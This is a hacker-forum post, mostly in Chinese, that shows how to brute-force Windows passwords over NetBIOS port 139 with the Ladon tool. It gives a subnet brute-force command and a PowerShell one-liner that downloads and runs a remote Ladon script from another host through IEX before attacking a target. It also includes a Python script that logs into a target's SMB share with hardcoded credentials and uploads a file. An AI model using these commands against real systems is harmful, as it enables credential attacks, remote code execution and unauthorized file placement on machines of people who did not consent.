• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

NbtScan 139端口弱口令/Netbios密码爆破【附工具】


k8

Recommended Posts

版本

Ladon >= 7.1

139端口

NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows”文件和打印机共享”和SAMBA。

IPC$通信

Windows系统中的net use ipc$整个通信过程,先445->137->139验证,当你开启防火墙禁用445,发现系统命令就无法连接IPC了,根本没机会走到139,所以使用系统自带命令连接的ipc$需要同时开启这些端口。说入侵139就是IPC$的说法是错误的,就像说wmiexec.vbs可完全替代PSEXEC工具一样,这个脚本需要目标开启135和445,因为它通过445来传输结果,意味着目标只开放135这个VBS的回显就没有了,其实假设目标只开放445,这个VBS脚本还能执行命令吗?哪来的替代或扔掉?这个系统的IPC$连接也是同理,测试首先得把其它端口禁了再说话。虽然系统自带命令需要同时开启,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的,详情参考impacket。

Nbt爆破

系统自带命令需要同时开启139和445,但是 自己实现SMB服务器的话是可以只使用139或只用445端口的。系统的IPC$就像读取系统密码一样,可以先植入CS再用MIMI插件读取,但是我们也可以不使用CS,直接MIMI读取密码啊。基于和MIMI可以独立读取密码的原理,反向思路我们也可以完全不走445,直接通过139验证WINDOWS密码,所以这个和IPC$不一样(指的是系统命令连接的ipc),所以为了防止大家误解,起名为NbtScan。毕竟走的也是Netbios,系统IPC$验证一是时间非常久,且必须开启445,如果445都开了为何不用SmbScan验证密码呢?但是由于近几年勒索病毒横行,可能很多机器默认会关闭445,所以会导致无法通过445验证密码,但是没关系还有139啊。

Ladon

139端口 Netbios密码爆破(Windows)

Ladon 192.168.1.8/24 NbtScan
 

PowerLadon

远程加载NbtScan 139端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon7.1_all.ps1'); Ladon 192.168.1.141 NbtScan”

139传输文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python
#coding:utf-8

from smb.SMBConnection import SMBConnection
from nmb.NetBIOS import NetBIOS
import os,sys
def getBIOSName(remote_smb_ip, timeout=30):
    try:
        bios = NetBIOS()
        srv_name = bios.queryIPForName(remote_smb_ip, timeout=timeout)
    except:
        print >> sys.stderr, "Looking up timeout, check remote_smb_ip again!!"
    finally:
        bios.close()
        return srv_name
serverip='192.168.1.40'
conn = SMBConnection('k8gege', 'k8gege520', 'C$',getBIOSName(serverip)[0], use_ntlm_v2 = True) 
assert conn.connect(serverip, 139)
#temdir='/'
#dir=os.path.join('/','public')
f = open('C:/123.txt', 'rb')
conn.storeFile('Users','234.txt',f)
f.close()

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now